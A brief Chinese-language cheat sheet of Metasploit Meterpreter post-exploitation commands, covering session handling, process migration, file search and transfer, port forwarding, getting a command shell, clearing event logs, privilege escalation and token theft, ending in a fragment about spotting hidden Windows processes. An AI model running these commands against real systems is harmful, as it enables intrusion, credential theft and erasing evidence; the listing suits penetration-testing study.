Meterpreter的簡單介紹
Meterpreter 是MSF自帶一個強大的SHELL,可以執行很多功能。
Meterpreter SHELL
基本操作
meterpreter>background #session隱藏到后台
meterpreter>bgkill #殺掉后台的一個meterpreter
meterpreter>bglist #列出后台的meterpreter
meterpreter>bgrun #運行后台的一個meterpreter
msf> sessions -l #查看回話session的list
msf> sessions 4 #切回四號回話,用於和background反操作
查看系統信息
meterpreter>sysinfo #獲取系統信息
meterpreter>getuid #獲取當前注入的用戶名稱
轉移注入進程
meterpreter>ps #查看進程list
meterpreter>migrate pid #轉移注入點的繼承
轉移注入進程后,源進程被殺掉,並不影響meterpreter的會話
文件和路徑類的操作
meterpreter>ls
meterpreter>pwd
meterpreter>mkdir
meterpreter>mv
meterpreter>rm
meterpreter>rmdir
#以上常見操作不在贅述
meterpreter>show_mount #展示磁盤情況
meterpreter>search -d c:\\ -f *.doc # -d 路徑 -f 文件名模式 搜索文件 例如搜索日志文件 *.evtx
meterpreter>upload /localpath/localfile c:\\remote\\remotepath #上傳文件
meterpreter>download c:\\xxx\xxx.xxx /root/... #下載文件
meterpreter>edit xxx #編輯文件,VIM的
網絡配置及其命令
meterpreter>arp #展示arp
meterpreter>getproxy #獲取代理信息
meterpreter>ifconfig(ipconfig) #查看網卡信息
meterpreter>route #打印路由
meterpreter>netstat #查看網絡連接情況
meterpreter>resolve #dns解析
meterpreter>portfwd #端口轉發portfwd add -l 1122 -p 3389 -r 192.168.250.176
系統操作及其命令
meterpreter>shell #獲取cmdshell
meterpreter>clearev #清除event log
meterpreter>execute #執行command
meterpreter>getpid(getuid、getdsid)
meterpreter>getpriv #提權
meterpreter>shutdown #關機
meterpreter>reboot #重啟
meterpreter>steal_token #竊取token
meterpreter>sysinfo #系統信息
meterpreter>localtime #獲取系統時間
用戶接口指令操作
Windows排查
進程
任務管理器看不到,但是tasklist和netstat 可以看到
